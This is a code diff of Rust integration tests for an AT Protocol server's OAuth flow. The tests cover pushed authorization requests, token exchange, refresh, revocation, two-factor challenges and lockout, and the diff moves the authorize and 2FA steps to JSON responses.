.json(&json!({ "handle": handle, "email": email, "password": "correct-password" }))
203
-
.send().await.unwrap();
204
let redirect_uri = "https://example.com/callback";
205
let mock_client = setup_mock_client_metadata(redirect_uri).await;
206
let client_id = mock_client.uri();
207
let (_, code_challenge) = generate_pkce();
208
let par_body: Value = http_client
209
.post(format!("{}/oauth/par", url))
210
-
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
211
-
("code_challenge", &code_challenge), ("code_challenge_method", "S256")])
212
-
.send().await.unwrap().json().await.unwrap();
213
let request_uri = par_body["request_uri"].as_str().unwrap();
214
let auth_res = http_client
215
.post(format!("{}/oauth/authorize", url))
216
.header("Accept", "application/json")
217
-
.form(&[("request_uri", request_uri), ("username", &handle), ("password", "wrong-password"), ("remember_device", "false")])
218
.send().await.unwrap();
219
assert_eq!(auth_res.status(), StatusCode::FORBIDDEN);
220
let error_body: Value = auth_res.json().await.unwrap();
221
assert_eq!(error_body["error"], "access_denied");
222
let unsupported = http_client
223
.post(format!("{}/oauth/token", url))
224
-
.form(&[("grant_type", "client_credentials"), ("client_id", "https://example.com")])
225
-
.send().await.unwrap();
226
assert_eq!(unsupported.status(), StatusCode::BAD_REQUEST);
227
let body: Value = unsupported.json().await.unwrap();
228
assert_eq!(body["error"], "unsupported_grant_type");
229
let invalid_refresh = http_client
230
.post(format!("{}/oauth/token", url))
231
-
.form(&[("grant_type", "refresh_token"), ("refresh_token", "invalid-token"), ("client_id", "https://example.com")])
232
-
.send().await.unwrap();
233
assert_eq!(invalid_refresh.status(), StatusCode::BAD_REQUEST);
234
let body: Value = invalid_refresh.json().await.unwrap();
235
assert_eq!(body["error"], "invalid_grant");
236
let invalid_introspect = http_client
237
.post(format!("{}/oauth/introspect", url))
238
.form(&[("token", "invalid.token.here")])
239
-
.send().await.unwrap();
240
assert_eq!(invalid_introspect.status(), StatusCode::OK);
241
let body: Value = invalid_introspect.json().await.unwrap();
242
assert_eq!(body["active"], false);
···
244
.get(format!("{}/oauth/authorize", url))
245
.header("Accept", "application/json")
246
.query(&[("request_uri", "urn:ietf:params:oauth:request_uri:expired")])
247
-
.send().await.unwrap();
248
assert_eq!(expired_res.status(), StatusCode::BAD_REQUEST);
249
}
250
···
259
let create_res = http_client
260
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
261
.json(&json!({ "handle": handle, "email": email, "password": password }))
262
-
.send().await.unwrap();
263
assert_eq!(create_res.status(), StatusCode::OK);
264
let account: Value = create_res.json().await.unwrap();
265
let user_did = account["did"].as_str().unwrap();
266
verify_new_account(&http_client, user_did).await;
267
let db_url = get_db_connection_string().await;
268
-
let pool = sqlx::postgres::PgPoolOptions::new().max_connections(1).connect(&db_url).await.unwrap();
269
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
270
-
.bind(user_did).execute(&pool).await.unwrap();
271
let redirect_uri = "https://example.com/2fa-callback";
272
let mock_client = setup_mock_client_metadata(redirect_uri).await;
273
let client_id = mock_client.uri();
274
let (code_verifier, code_challenge) = generate_pkce();
275
let par_body: Value = http_client
276
.post(format!("{}/oauth/par", url))
277
-
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
278
-
("code_challenge", &code_challenge), ("code_challenge_method", "S256")])
279
-
.send().await.unwrap().json().await.unwrap();
280
let request_uri = par_body["request_uri"].as_str().unwrap();
281
-
let auth_client = no_redirect_client();
282
-
let auth_res = auth_client
283
.post(format!("{}/oauth/authorize", url))
284
-
.form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "false")])
285
.send().await.unwrap();
286
-
assert!(auth_res.status().is_redirection(), "Should redirect to 2FA page");
287
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
288
-
assert!(location.contains("/oauth/authorize/2fa"), "Should redirect to 2FA page, got: {}", location);
289
let twofa_invalid = http_client
290
.post(format!("{}/oauth/authorize/2fa", url))
291
-
.form(&[("request_uri", request_uri), ("code", "000000")])
292
-
.send().await.unwrap();
293
-
assert_eq!(twofa_invalid.status(), StatusCode::OK);
294
-
let body = twofa_invalid.text().await.unwrap();
295
-
assert!(body.contains("Invalid verification code") || body.contains("invalid"));
296
-
let twofa_code: String = sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1")
297
-
.bind(request_uri).fetch_one(&pool).await.unwrap();
298
-
let twofa_res = auth_client
299
.post(format!("{}/oauth/authorize/2fa", url))
300
-
.form(&[("request_uri", request_uri), ("code", &twofa_code)])
301
-
.send().await.unwrap();
302
-
assert!(twofa_res.status().is_redirection(), "Valid 2FA code should redirect");
303
-
let final_location = twofa_res.headers().get("location").unwrap().to_str().unwrap();
304
assert!(final_location.starts_with(redirect_uri) && final_location.contains("code="));
305
-
let auth_code = final_location.split("code=").nth(1).unwrap().split('&').next().unwrap();
306
let token_res = http_client
307
.post(format!("{}/oauth/token", url))
308
-
.form(&[("grant_type", "authorization_code"), ("code", auth_code), ("redirect_uri", redirect_uri),
309
-
("code_verifier", &code_verifier), ("client_id", &client_id)])
310
-
.send().await.unwrap();
311
assert_eq!(token_res.status(), StatusCode::OK);
312
let token_body: Value = token_res.json().await.unwrap();
313
assert_eq!(token_body["sub"], user_did);
···
324
let create_res = http_client
325
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
326
.json(&json!({ "handle": handle, "email": email, "password": password }))
327
-
.send().await.unwrap();
328
let account: Value = create_res.json().await.unwrap();
329
let user_did = account["did"].as_str().unwrap();
330
verify_new_account(&http_client, user_did).await;
331
let db_url = get_db_connection_string().await;
332
-
let pool = sqlx::postgres::PgPoolOptions::new().max_connections(1).connect(&db_url).await.unwrap();
333
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
334
-
.bind(user_did).execute(&pool).await.unwrap();
335
let redirect_uri = "https://example.com/2fa-lockout-callback";
336
let mock_client = setup_mock_client_metadata(redirect_uri).await;
337
let client_id = mock_client.uri();
338
let (_, code_challenge) = generate_pkce();
339
let par_body: Value = http_client
340
.post(format!("{}/oauth/par", url))
341
-
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
342
-
("code_challenge", &code_challenge), ("code_challenge_method", "S256")])
343
-
.send().await.unwrap().json().await.unwrap();
344
let request_uri = par_body["request_uri"].as_str().unwrap();
345
-
let auth_client = no_redirect_client();
346
-
let auth_res = auth_client
347
.post(format!("{}/oauth/authorize", url))
348
-
.form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "false")])
349
.send().await.unwrap();
350
-
assert!(auth_res.status().is_redirection());
351
for i in 0..5 {
352
let res = http_client
353
.post(format!("{}/oauth/authorize/2fa", url))
354
-
.form(&[("request_uri", request_uri), ("code", "999999")])
355
-
.send().await.unwrap();
356
if i < 4 {
357
-
assert_eq!(res.status(), StatusCode::OK);
358
}
359
}
360
let lockout_res = http_client
361
.post(format!("{}/oauth/authorize/2fa", url))
362
-
.form(&[("request_uri", request_uri), ("code", "999999")])
363
-
.send().await.unwrap();
364
-
let body = lockout_res.text().await.unwrap();
365
-
assert!(body.contains("Too many failed attempts") || body.contains("No 2FA challenge found"));
366
}
367
368
#[tokio::test]
···
376
let create_res = http_client
377
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
378
.json(&json!({ "handle": handle, "email": email, "password": password }))
379
-
.send().await.unwrap();
380
let account: Value = create_res.json().await.unwrap();
381
let user_did = account["did"].as_str().unwrap().to_string();
382
verify_new_account(&http_client, &user_did).await;
···
386
let (code_verifier, code_challenge) = generate_pkce();
387
let par_body: Value = http_client
388
.post(format!("{}/oauth/par", url))
389
-
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
390
-
("code_challenge", &code_challenge), ("code_challenge_method", "S256")])
391
-
.send().await.unwrap().json().await.unwrap();
392
let request_uri = par_body["request_uri"].as_str().unwrap();
393
-
let auth_client = no_redirect_client();
394
-
let auth_res = auth_client
395
.post(format!("{}/oauth/authorize", url))
396
-
.form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "true")])
397
.send().await.unwrap();
398
-
assert!(auth_res.status().is_redirection());
399
-
let device_cookie = auth_res.headers().get("set-cookie")
400
.and_then(|v| v.to_str().ok())
401
.map(|s| s.split(';').next().unwrap_or("").to_string())
402
.expect("Should have device cookie");
403
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
404
assert!(location.contains("code="));
405
-
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
406
let _ = http_client
407
.post(format!("{}/oauth/token", url))
408
-
.form(&[("grant_type", "authorization_code"), ("code", code), ("redirect_uri", redirect_uri),
409
-
("code_verifier", &code_verifier), ("client_id", &client_id)])
410
-
.send().await.unwrap().json::<Value>().await.unwrap();
411
let db_url = get_db_connection_string().await;
412
-
let pool = sqlx::postgres::PgPoolOptions::new().max_connections(1).connect(&db_url).await.unwrap();
413
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
414
-
.bind(&user_did).execute(&pool).await.unwrap();
415
let (code_verifier2, code_challenge2) = generate_pkce();
416
let par_body2: Value = http_client
417
.post(format!("{}/oauth/par", url))
418
-
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
419
-
("code_challenge", &code_challenge2), ("code_challenge_method", "S256")])
420
-
.send().await.unwrap().json().await.unwrap();
421
let request_uri2 = par_body2["request_uri"].as_str().unwrap();
422
-
let select_res = auth_client
423
.post(format!("{}/oauth/authorize/select", url))
424
.header("cookie", &device_cookie)
425
-
.form(&[("request_uri", request_uri2), ("did", &user_did)])
426
-
.send().await.unwrap();
427
-
assert!(select_res.status().is_redirection());
428
-
let select_location = select_res.headers().get("location").unwrap().to_str().unwrap();
429
-
assert!(select_location.contains("/oauth/authorize/2fa"), "Should redirect to 2FA page");
430
-
let twofa_code: String = sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1")
431
-
.bind(request_uri2).fetch_one(&pool).await.unwrap();
432
-
let twofa_res = auth_client
433
.post(format!("{}/oauth/authorize/2fa", url))
434
.header("cookie", &device_cookie)
435
-
.form(&[("request_uri", request_uri2), ("code", &twofa_code)])
436
-
.send().await.unwrap();
437
-
assert!(twofa_res.status().is_redirection());
438
-
let final_location = twofa_res.headers().get("location").unwrap().to_str().unwrap();
439
assert!(final_location.starts_with(redirect_uri) && final_location.contains("code="));
440
-
let final_code = final_location.split("code=").nth(1).unwrap().split('&').next().unwrap();
441
let token_res = http_client
442
.post(format!("{}/oauth/token", url))
443
-
.form(&[("grant_type", "authorization_code"), ("code", final_code), ("redirect_uri", redirect_uri),
444
-
("code_verifier", &code_verifier2), ("client_id", &client_id)])
445
-
.send().await.unwrap();
446
assert_eq!(token_res.status(), StatusCode::OK);
447
let final_token: Value = token_res.json().await.unwrap();
448
assert_eq!(final_token["sub"], user_did);
···
459
let create_res = http_client
460
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
461
.json(&json!({ "handle": handle, "email": email, "password": password }))
462
-
.send().await.unwrap();
463
let account: Value = create_res.json().await.unwrap();
464
verify_new_account(&http_client, account["did"].as_str().unwrap()).await;
465
let redirect_uri = "https://example.com/state-special-callback";
···
469
let special_state = "state=with&special=chars&plus+more";
470
let par_body: Value = http_client
471
.post(format!("{}/oauth/par", url))
472
-
.form(&[("response_type", "code"), ("client_id", &client_id), ("redirect_uri", redirect_uri),
473
-
("code_challenge", &code_challenge), ("code_challenge_method", "S256"), ("state", special_state)])
474
-
.send().await.unwrap().json().await.unwrap();
475
let request_uri = par_body["request_uri"].as_str().unwrap();
476
-
let auth_client = no_redirect_client();
477
-
let auth_res = auth_client
478
.post(format!("{}/oauth/authorize", url))
479
-
.form(&[("request_uri", request_uri), ("username", &handle), ("password", password), ("remember_device", "false")])
480
.send().await.unwrap();
481
-
assert!(auth_res.status().is_redirection());
482
-
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
483
assert!(location.contains("state="));
484
let encoded_state = urlencoding::encode(special_state);
485
-
assert!(location.contains(&format!("state={}", encoded_state)), "State should be URL-encoded. Got: {}", location);
486
}
···
11
use wiremock::{Mock, MockServer, ResponseTemplate};
12
13
fn no_redirect_client() -> reqwest::Client {
14
+
reqwest::Client::builder()
15
+
.redirect(redirect::Policy::none())
16
+
.build()
17
+
.unwrap()
18
}
19
20
fn generate_pkce() -> (String, String) {
···
50
async fn test_oauth_metadata_endpoints() {
51
let url = base_url().await;
52
let client = client();
53
+
let pr_res = client
54
+
.get(format!("{}/.well-known/oauth-protected-resource", url))
55
+
.send()
56
+
.await
57
+
.unwrap();
58
assert_eq!(pr_res.status(), StatusCode::OK);
59
let pr_body: Value = pr_res.json().await.unwrap();
60
assert!(pr_body["resource"].is_string());
61
assert!(pr_body["authorization_servers"].is_array());
62
+
assert!(
63
+
pr_body["bearer_methods_supported"]
64
+
.as_array()
65
+
.unwrap()
66
+
.contains(&json!("header"))
67
+
);
68
+
let as_res = client
69
+
.get(format!("{}/.well-known/oauth-authorization-server", url))
70
+
.send()
71
+
.await
72
+
.unwrap();
73
assert_eq!(as_res.status(), StatusCode::OK);
74
let as_body: Value = as_res.json().await.unwrap();
75
assert!(as_body["issuer"].is_string());
76
assert!(as_body["authorization_endpoint"].is_string());
77
assert!(as_body["token_endpoint"].is_string());
78
assert!(as_body["jwks_uri"].is_string());
79
+
assert!(
80
+
as_body["response_types_supported"]
81
+
.as_array()
82
+
.unwrap()
83
+
.contains(&json!("code"))
84
+
);
85
+
assert!(
86
+
as_body["grant_types_supported"]
87
+
.as_array()
88
+
.unwrap()
89
+
.contains(&json!("authorization_code"))
90
+
);
91
+
assert!(
92
+
as_body["code_challenge_methods_supported"]
93
+
.as_array()
94
+
.unwrap()
95
+
.contains(&json!("S256"))
96
+
);
97
+
assert_eq!(
98
+
as_body["require_pushed_authorization_requests"],
99
+
json!(true)
100
+
);
101
+
assert!(
102
+
as_body["dpop_signing_alg_values_supported"]
103
+
.as_array()
104
+
.unwrap()
105
+
.contains(&json!("ES256"))
106
+
);
107
+
let jwks_res = client
108
+
.get(format!("{}/oauth/jwks", url))
109
+
.send()
110
+
.await
111
+
.unwrap();
112
assert_eq!(jwks_res.status(), StatusCode::OK);
113
let jwks_body: Value = jwks_res.json().await.unwrap();
114
assert!(jwks_body["keys"].is_array());
···
124
let (_, code_challenge) = generate_pkce();
125
let par_res = client
126
.post(format!("{}/oauth/par", url))
127
+
.form(&[
128
+
("response_type", "code"),
129
+
("client_id", &client_id),
130
+
("redirect_uri", redirect_uri),
131
+
("code_challenge", &code_challenge),
132
+
("code_challenge_method", "S256"),
133
+
("scope", "atproto"),
134
+
("state", "test-state"),
135
+
])
136
+
.send()
137
+
.await
138
+
.unwrap();
139
assert_eq!(par_res.status(), StatusCode::CREATED, "PAR should succeed");
140
let par_body: Value = par_res.json().await.unwrap();
141
assert!(par_body["request_uri"].is_string());
···
146
.get(format!("{}/oauth/authorize", url))
147
.header("Accept", "application/json")
148
.query(&[("request_uri", request_uri)])
149
+
.send()
150
+
.await
151
+
.unwrap();
152
assert_eq!(auth_res.status(), StatusCode::OK);
153
let auth_body: Value = auth_res.json().await.unwrap();
154
assert_eq!(auth_body["client_id"], client_id);
···
157
let invalid_res = client
158
.get(format!("{}/oauth/authorize", url))
159
.header("Accept", "application/json")
160
+
.query(&[(
161
+
"request_uri",
162
+
"urn:ietf:params:oauth:request_uri:nonexistent",
163
+
)])
164
+
.send()
165
+
.await
166
+
.unwrap();
167
assert_eq!(invalid_res.status(), StatusCode::BAD_REQUEST);
168
+
let missing_client = no_redirect_client();
169
+
let missing_res = missing_client
170
+
.get(format!("{}/oauth/authorize", url))
171
+
.send()
172
+
.await
173
+
.unwrap();
174
+
assert!(
175
+
missing_res.status().is_redirection(),
176
+
"Should redirect to error page"
177
+
);
178
+
let error_location = missing_res
179
+
.headers()
180
+
.get("location")
181
+
.unwrap()
182
+
.to_str()
183
+
.unwrap();
184
+
assert!(
185
+
error_location.contains("oauth/error"),
186
+
"Should redirect to error page"
187
+
);
188
}
189
190
#[tokio::test]
···
198
let create_res = http_client
199
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
200
.json(&json!({ "handle": handle, "email": email, "password": password }))
201
+
.send()
202
+
.await
203
+
.unwrap();
204
assert_eq!(create_res.status(), StatusCode::OK);
205
let account: Value = create_res.json().await.unwrap();
206
let user_did = account["did"].as_str().unwrap();
···
212
let state = format!("state-{}", ts);
213
let par_res = http_client
214
.post(format!("{}/oauth/par", url))
215
+
.form(&[
216
+
("response_type", "code"),
217
+
("client_id", &client_id),
218
+
("redirect_uri", redirect_uri),
219
+
("code_challenge", &code_challenge),
220
+
("code_challenge_method", "S256"),
221
+
("scope", "atproto"),
222
+
("state", &state),
223
+
])
224
+
.send()
225
+
.await
226
+
.unwrap();
227
let par_body: Value = par_res.json().await.unwrap();
228
let request_uri = par_body["request_uri"].as_str().unwrap();
229
+
let auth_res = http_client
230
.post(format!("{}/oauth/authorize", url))
231
+
.header("Content-Type", "application/json")
232
+
.header("Accept", "application/json")
233
+
.json(&json!({"request_uri": request_uri, "username": &handle, "password": password, "remember_device": false}))
234
.send().await.unwrap();
235
+
assert_eq!(
236
+
auth_res.status(),
237
+
StatusCode::OK,
238
+
"Expected OK with JSON response"
239
+
);
240
+
let auth_body: Value = auth_res.json().await.unwrap();
241
+
let mut location = auth_body["redirect_uri"]
242
+
.as_str()
243
+
.expect("Expected redirect_uri in response")
244
+
.to_string();
245
+
if location.contains("/oauth/consent") {
246
+
let consent_res = http_client
247
+
.post(format!("{}/oauth/authorize/consent", url))
248
+
.header("Content-Type", "application/json")
249
+
.json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": false}))
250
+
.send().await.unwrap();
251
+
let consent_status = consent_res.status();
252
+
let consent_body: Value = consent_res.json().await.unwrap();
253
+
assert_eq!(
254
+
consent_status,
255
+
StatusCode::OK,
256
+
"Consent should succeed. Got: {:?}",
257
+
consent_body
258
+
);
259
+
location = consent_body["redirect_uri"]
260
+
.as_str()
261
+
.expect("Expected redirect_uri from consent")
262
+
.to_string();
263
+
}
264
+
assert!(
265
+
location.starts_with(redirect_uri),
266
+
"Redirect to wrong URI: {}",
267
+
location
268
+
);
269
assert!(location.contains("code="), "No code in redirect");
270
+
assert!(
271
+
location.contains(&format!("state={}", state)),
272
+
"Wrong state"
273
+
);
274
+
let code = location
275
+
.split("code=")
276
+
.nth(1)
277
+
.unwrap()
278
+
.split('&')
279
+
.next()
280
+
.unwrap();
281
let token_res = http_client
282
.post(format!("{}/oauth/token", url))
283
+
.form(&[
284
+
("grant_type", "authorization_code"),
285
+
("code", code),
286
+
("redirect_uri", redirect_uri),
287
+
("code_verifier", &code_verifier),
288
+
("client_id", &client_id),
289
+
])
290
+
.send()
291
+
.await
292
+
.unwrap();
293
assert_eq!(token_res.status(), StatusCode::OK, "Token exchange failed");
294
let token_body: Value = token_res.json().await.unwrap();
295
assert!(token_body["access_token"].is_string());
···
301
let refresh_token = token_body["refresh_token"].as_str().unwrap();
302
let refresh_res = http_client
303
.post(format!("{}/oauth/token", url))
304
+
.form(&[
305
+
("grant_type", "refresh_token"),
306
+
("refresh_token", refresh_token),
307
+
("client_id", &client_id),
308
+
])
309
+
.send()
310
+
.await
311
+
.unwrap();
312
assert_eq!(refresh_res.status(), StatusCode::OK);
313
let refresh_body: Value = refresh_res.json().await.unwrap();
314
assert_ne!(refresh_body["access_token"].as_str().unwrap(), access_token);
315
+
assert_ne!(
316
+
refresh_body["refresh_token"].as_str().unwrap(),
317
+
refresh_token
318
+
);
319
let introspect_res = http_client
320
.post(format!("{}/oauth/introspect", url))
321
.form(&[("token", refresh_body["access_token"].as_str().unwrap())])
322
+
.send()
323
+
.await
324
+
.unwrap();
325
assert_eq!(introspect_res.status(), StatusCode::OK);
326
let introspect_body: Value = introspect_res.json().await.unwrap();
327
assert_eq!(introspect_body["active"], true);
328
let revoke_res = http_client
329
.post(format!("{}/oauth/revoke", url))
330
.form(&[("token", refresh_body["refresh_token"].as_str().unwrap())])
331
+
.send()
332
+
.await
333
+
.unwrap();
334
assert_eq!(revoke_res.status(), StatusCode::OK);
335
let introspect_after = http_client
336
.post(format!("{}/oauth/introspect", url))
337
.form(&[("token", refresh_body["access_token"].as_str().unwrap())])
338
+
.send()
339
+
.await
340
+
.unwrap();
341
let after_body: Value = introspect_after.json().await.unwrap();
342
+
assert_eq!(
343
+
after_body["active"], false,
344
+
"Revoked token should be inactive"
345
+
);
346
}
347
348
#[tokio::test]
···
352
let ts = Utc::now().timestamp_millis();
353
let handle = format!("wrong-creds-{}", ts);
354
let email = format!("wrong-creds-{}@example.com", ts);
355
+
http_client
356
+
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
357
.json(&json!({ "handle": handle, "email": email, "password": "correct-password" }))
358
+
.send()
359
+
.await
360
+
.unwrap();
361
let redirect_uri = "https://example.com/callback";
362
let mock_client = setup_mock_client_metadata(redirect_uri).await;
363
let client_id = mock_client.uri();
364
let (_, code_challenge) = generate_pkce();
365
let par_body: Value = http_client
366
.post(format!("{}/oauth/par", url))
367
+
.form(&[
368
+
("response_type", "code"),
369
+
("client_id", &client_id),
370
+
("redirect_uri", redirect_uri),
371
+
("code_challenge", &code_challenge),
372
+
("code_challenge_method", "S256"),
373
+
])
374
+
.send()
375
+
.await
376
+
.unwrap()
377
+
.json()
378
+
.await
379
+
.unwrap();
380
let request_uri = par_body["request_uri"].as_str().unwrap();
381
let auth_res = http_client
382
.post(format!("{}/oauth/authorize", url))
383
+
.header("Content-Type", "application/json")
384
.header("Accept", "application/json")
385
+
.json(&json!({"request_uri": request_uri, "username": &handle, "password": "wrong-password", "remember_device": false}))
386
.send().await.unwrap();
387
assert_eq!(auth_res.status(), StatusCode::FORBIDDEN);
388
let error_body: Value = auth_res.json().await.unwrap();
389
assert_eq!(error_body["error"], "access_denied");
390
let unsupported = http_client
391
.post(format!("{}/oauth/token", url))
392
+
.form(&[
393
+
("grant_type", "client_credentials"),
394
+
("client_id", "https://example.com"),
395
+
])
396
+
.send()
397
+
.await
398
+
.unwrap();
399
assert_eq!(unsupported.status(), StatusCode::BAD_REQUEST);
400
let body: Value = unsupported.json().await.unwrap();
401
assert_eq!(body["error"], "unsupported_grant_type");
402
let invalid_refresh = http_client
403
.post(format!("{}/oauth/token", url))
404
+
.form(&[
405
+
("grant_type", "refresh_token"),
406
+
("refresh_token", "invalid-token"),
407
+
("client_id", "https://example.com"),
408
+
])
409
+
.send()
410
+
.await
411
+
.unwrap();
412
assert_eq!(invalid_refresh.status(), StatusCode::BAD_REQUEST);
413
let body: Value = invalid_refresh.json().await.unwrap();
414
assert_eq!(body["error"], "invalid_grant");
415
let invalid_introspect = http_client
416
.post(format!("{}/oauth/introspect", url))
417
.form(&[("token", "invalid.token.here")])
418
+
.send()
419
+
.await
420
+
.unwrap();
421
assert_eq!(invalid_introspect.status(), StatusCode::OK);
422
let body: Value = invalid_introspect.json().await.unwrap();
423
assert_eq!(body["active"], false);
···
425
.get(format!("{}/oauth/authorize", url))
426
.header("Accept", "application/json")
427
.query(&[("request_uri", "urn:ietf:params:oauth:request_uri:expired")])
428
+
.send()
429
+
.await
430
+
.unwrap();
431
assert_eq!(expired_res.status(), StatusCode::BAD_REQUEST);
432
}
433
···
442
let create_res = http_client
443
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
444
.json(&json!({ "handle": handle, "email": email, "password": password }))
445
+
.send()
446
+
.await
447
+
.unwrap();
448
assert_eq!(create_res.status(), StatusCode::OK);
449
let account: Value = create_res.json().await.unwrap();
450
let user_did = account["did"].as_str().unwrap();
451
verify_new_account(&http_client, user_did).await;
452
let db_url = get_db_connection_string().await;
453
+
let pool = sqlx::postgres::PgPoolOptions::new()
454
+
.max_connections(1)
455
+
.connect(&db_url)
456
+
.await
457
+
.unwrap();
458
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
459
+
.bind(user_did)
460
+
.execute(&pool)
461
+
.await
462
+
.unwrap();
463
let redirect_uri = "https://example.com/2fa-callback";
464
let mock_client = setup_mock_client_metadata(redirect_uri).await;
465
let client_id = mock_client.uri();
466
let (code_verifier, code_challenge) = generate_pkce();
467
let par_body: Value = http_client
468
.post(format!("{}/oauth/par", url))
469
+
.form(&[
470
+
("response_type", "code"),
471
+
("client_id", &client_id),
472
+
("redirect_uri", redirect_uri),
473
+
("code_challenge", &code_challenge),
474
+
("code_challenge_method", "S256"),
475
+
])
476
+
.send()
477
+
.await
478
+
.unwrap()
479
+
.json()
480
+
.await
481
+
.unwrap();
482
let request_uri = par_body["request_uri"].as_str().unwrap();
483
+
let auth_res = http_client
484
.post(format!("{}/oauth/authorize", url))
485
+
.header("Content-Type", "application/json")
486
+
.header("Accept", "application/json")
487
+
.json(&json!({"request_uri": request_uri, "username": &handle, "password": password, "remember_device": false}))
488
.send().await.unwrap();
489
+
assert_eq!(
490
+
auth_res.status(),
491
+
StatusCode::OK,
492
+
"Should return OK with needs_2fa"
493
+
);
494
+
let auth_body: Value = auth_res.json().await.unwrap();
495
+
assert!(
496
+
auth_body["needs_2fa"].as_bool().unwrap_or(false),
497
+
"Should need 2FA, got: {:?}",
498
+
auth_body
499
+
);
500
let twofa_invalid = http_client
501
.post(format!("{}/oauth/authorize/2fa", url))
502
+
.header("Content-Type", "application/json")
503
+
.json(&json!({"request_uri": request_uri, "code": "000000"}))
504
+
.send()
505
+
.await
506
+
.unwrap();
507
+
assert_eq!(twofa_invalid.status(), StatusCode::FORBIDDEN);
508
+
let body: Value = twofa_invalid.json().await.unwrap();
509
+
assert!(
510
+
body["error_description"]
511
+
.as_str()
512
+
.unwrap_or("")
513
+
.contains("Invalid")
514
+
|| body["error"].as_str().unwrap_or("") == "invalid_code"
515
+
);
516
+
let twofa_code: String =
517
+
sqlx::query_scalar("SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1")
518
+
.bind(request_uri)
519
+
.fetch_one(&pool)
520
+
.await
521
+
.unwrap();
522
+
let twofa_res = http_client
523
.post(format!("{}/oauth/authorize/2fa", url))
524
+
.header("Content-Type", "application/json")
525
+
.json(&json!({"request_uri": request_uri, "code": &twofa_code}))
526
+
.send()
527
+
.await
528
+
.unwrap();
529
+
assert_eq!(
530
+
twofa_res.status(),
531
+
StatusCode::OK,
532
+
"Valid 2FA code should succeed"
533
+
);
534
+
let twofa_body: Value = twofa_res.json().await.unwrap();
535
+
let final_location = twofa_body["redirect_uri"].as_str().unwrap();
536
assert!(final_location.starts_with(redirect_uri) && final_location.contains("code="));
537
+
let auth_code = final_location
538
+
.split("code=")
539
+
.nth(1)
540
+
.unwrap()
541
+
.split('&')
542
+
.next()
543
+
.unwrap();
544
let token_res = http_client
545
.post(format!("{}/oauth/token", url))
546
+
.form(&[
547
+
("grant_type", "authorization_code"),
548
+
("code", auth_code),
549
+
("redirect_uri", redirect_uri),
550
+
("code_verifier", &code_verifier),
551
+
("client_id", &client_id),
552
+
])
553
+
.send()
554
+
.await
555
+
.unwrap();
556
assert_eq!(token_res.status(), StatusCode::OK);
557
let token_body: Value = token_res.json().await.unwrap();
558
assert_eq!(token_body["sub"], user_did);
···
569
let create_res = http_client
570
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
571
.json(&json!({ "handle": handle, "email": email, "password": password }))
572
+
.send()
573
+
.await
574
+
.unwrap();
575
let account: Value = create_res.json().await.unwrap();
576
let user_did = account["did"].as_str().unwrap();
577
verify_new_account(&http_client, user_did).await;
578
let db_url = get_db_connection_string().await;
579
+
let pool = sqlx::postgres::PgPoolOptions::new()
580
+
.max_connections(1)
581
+
.connect(&db_url)
582
+
.await
583
+
.unwrap();
584
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
585
+
.bind(user_did)
586
+
.execute(&pool)
587
+
.await
588
+
.unwrap();
589
let redirect_uri = "https://example.com/2fa-lockout-callback";
590
let mock_client = setup_mock_client_metadata(redirect_uri).await;
591
let client_id = mock_client.uri();
592
let (_, code_challenge) = generate_pkce();
593
let par_body: Value = http_client
594
.post(format!("{}/oauth/par", url))
595
+
.form(&[
596
+
("response_type", "code"),
597
+
("client_id", &client_id),
598
+
("redirect_uri", redirect_uri),
599
+
("code_challenge", &code_challenge),
600
+
("code_challenge_method", "S256"),
601
+
])
602
+
.send()
603
+
.await
604
+
.unwrap()
605
+
.json()
606
+
.await
607
+
.unwrap();
608
let request_uri = par_body["request_uri"].as_str().unwrap();
609
+
let auth_res = http_client
610
.post(format!("{}/oauth/authorize", url))
611
+
.header("Content-Type", "application/json")
612
+
.header("Accept", "application/json")
613
+
.json(&json!({"request_uri": request_uri, "username": &handle, "password": password, "remember_device": false}))
614
.send().await.unwrap();
615
+
assert_eq!(
616
+
auth_res.status(),
617
+
StatusCode::OK,
618
+
"Should return OK with needs_2fa"
619
+
);
620
+
let auth_body: Value = auth_res.json().await.unwrap();
621
+
assert!(
622
+
auth_body["needs_2fa"].as_bool().unwrap_or(false),
623
+
"Should need 2FA"
624
+
);
625
for i in 0..5 {
626
let res = http_client
627
.post(format!("{}/oauth/authorize/2fa", url))
628
+
.header("Content-Type", "application/json")
629
+
.json(&json!({"request_uri": request_uri, "code": "999999"}))
630
+
.send()
631
+
.await
632
+
.unwrap();
633
if i < 4 {
634
+
assert_eq!(
635
+
res.status(),
636
+
StatusCode::FORBIDDEN,
637
+
"Attempt {} should return 403",
638
+
i
639
+
);
640
}
641
}
642
let lockout_res = http_client
643
.post(format!("{}/oauth/authorize/2fa", url))
644
+
.header("Content-Type", "application/json")
645
+
.json(&json!({"request_uri": request_uri, "code": "999999"}))
646
+
.send()
647
+
.await
648
+
